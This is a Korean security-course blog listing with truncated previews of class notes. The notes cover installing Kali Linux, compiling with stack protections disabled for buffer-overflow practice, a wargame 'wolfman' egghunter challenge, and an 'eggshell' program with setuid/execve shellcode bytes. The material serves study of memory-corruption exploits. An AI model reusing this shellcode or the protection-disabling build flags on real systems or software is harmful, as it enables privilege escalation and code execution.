정보보안80 정보보안4 1차시 https://cafe.naver.com/linuxmasternet/32139칼리 리눅스 설치https://www.kali.org/get-kali/#kali-virtual-machines다운로드 : virtual-machines의 VMware 기본 로그인 계정은 kali kali 기본셋팅 기본쉘을 Z쉘에서 /bin/bash로 변경 (자동완성 기능이 불편해서 편의상 변경) 포트 확인 시간대 변경첫 시작시 미국기준 시각이 셋팅되어 있음timedatectl로 list-timezones에서 Seoul 찾고timedatectl의 set-timezones에 Asia/Seoul 설정date를 다시 쳐보면 KST 로 변경되어 있음 한글설정apt -y update apt -y upgrade apt-get -y ins.. 2024. 6. 29. 정보보안3 8차시 컴파일할 때 메모리(스택)에서 코드가 실행될 수 있도록 메모리 보호옵션을 해제-fno-stack-protector: 스택 프로텍터 제거 옵션 -z execstack: 스택에 올라가 있는 기계어 코드를 실행하는 옵션 -mpreferred-stack-boundary=2: 함수들의 스택프레임에서 가장 낮은 주소가 2^N 에 배수가 되도록 align 하는 옵션 alias gcc='gcc -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack'편의성을 위해 alias에 추가해둠 실행환경은 Centos7 보안때문에 낮은버전으로 선택 -static로 컴파일 하기 위해 yum -y install gcc glibc-static glibc-static.i686 설치.. 2024. 6. 23. 정보보안3 7차시 boforc 사용자의 wolfman 문제 egghunter + buffer hunter#include #include extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc printf("argv error\n"); exit(0); } // egghunter for(i=0; environ[i]; i++){ memset(environ[i], 0, strlen(environ[i])); } if(argv[1][47] !.. 2024. 6. 22. eggshell 추후 분석 vi eggshell.c #include #include #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" //setuid(geteuid()) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\.. 2024. 6. 22. 이전 1 ··· 11 12 13 14 15 16 17 ··· 20 다음